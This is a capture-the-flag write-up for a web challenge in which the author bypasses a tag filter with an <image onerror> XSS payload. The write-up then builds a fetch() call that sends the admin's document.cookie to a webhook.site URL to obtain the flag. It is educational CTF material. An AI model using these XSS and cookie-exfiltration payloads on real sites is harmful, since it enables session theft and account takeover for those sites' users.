Try   HackMD

KCSC TTV 2023/Web/Hi Hi Hi

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Solution

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

After access link, At the title of page suggested that using XSS
So that, let try some payload at Payload XSS

All payloads contain <script>,<img> or equivalent use <script>,<img> tags are blocked.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

In addition to the <script>,<img> tags, there are many other tags that help us execute the function.

In this chall we can use <image>,<audio>,... tags

Like that: <image src =q onerror=prompt(8)>

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

XSS done!

Next step is send a report for admin and steal their cookie.

Format URL: http://127.0.0.1:13337/?message=your_payload

In the payload instead of use prompt(), we use fetch() to redirect admin to our server (I often use Webhook.site)

URL: http://127.0.0.1:13337/?message=<image src =q onerror=fetch('https://webhook.site/e3897dc9-35d2-450d-a2fd-81b3f023c9fb')>

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

It works!

Now take their cookie with URL: http://127.0.0.1:13337/?message=<image src =q onerror=fetch(`https://webhook.site/e3897dc9-35d2-450d-a2fd-81b3f023c9fb/?cookie=${document.cookie}`)>

In this case, to add variable document.cookie to string url in fetch() function we use template literals in js. (Template Literals)

Send that report we will receive admin's cookie

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

It's also Flag: KCSC{T3T_TU1_3_T13P_Hmmmmmmmm}

Last changed by 
tu3n4nh
0
147

Read more

University CTF 2023: Brains & Bytes write up

h

Dec 11, 2023
Vỡ lòng JWT

Khi nào nên dùng JSON Web Token?Authentication: Đây là trường hợp phổ biến nhất thường sử dụng JWT. Khi người dùng đã đăng nhập vào hệ thống thì những request tiếp theo từ phía người dùng sẽ chứa thêm mã JWT. Điều này cho phép người dùng được cấp quyền truy cập vào các url, service, và resource mà mã Token đó cho phép. Phương pháp này không bị ảnh hưởng bởi Cross-Origin Resource Sharing (CORS) do nó không sử dụng cookie.

Jul 13, 2023
KCSC TTV 2023/Web/XXD

Solution After fill in information and submit. At the client side, informations are handled and POST to the server with XML format. Because POST XML is handled at client side, we can modify this. Depend on first hint: We access XXE payload of Payload All The Thing

May 24, 2023
KCSC TTV 2023/Web/Phpri Phprai

Solution Vào chall ta thấy được source của chall được show ra và việc cần làm chỉ là bypass từ phần để lấy được toàn bộ flag Flag1: Flag will echo if(($str1 !== $str2) && (md5($str1) == md5($str2)) $str1 and $str2 variables are got form url, so we can customize it.

May 24, 2023
Read more from tu3n4nh
Published on HackMD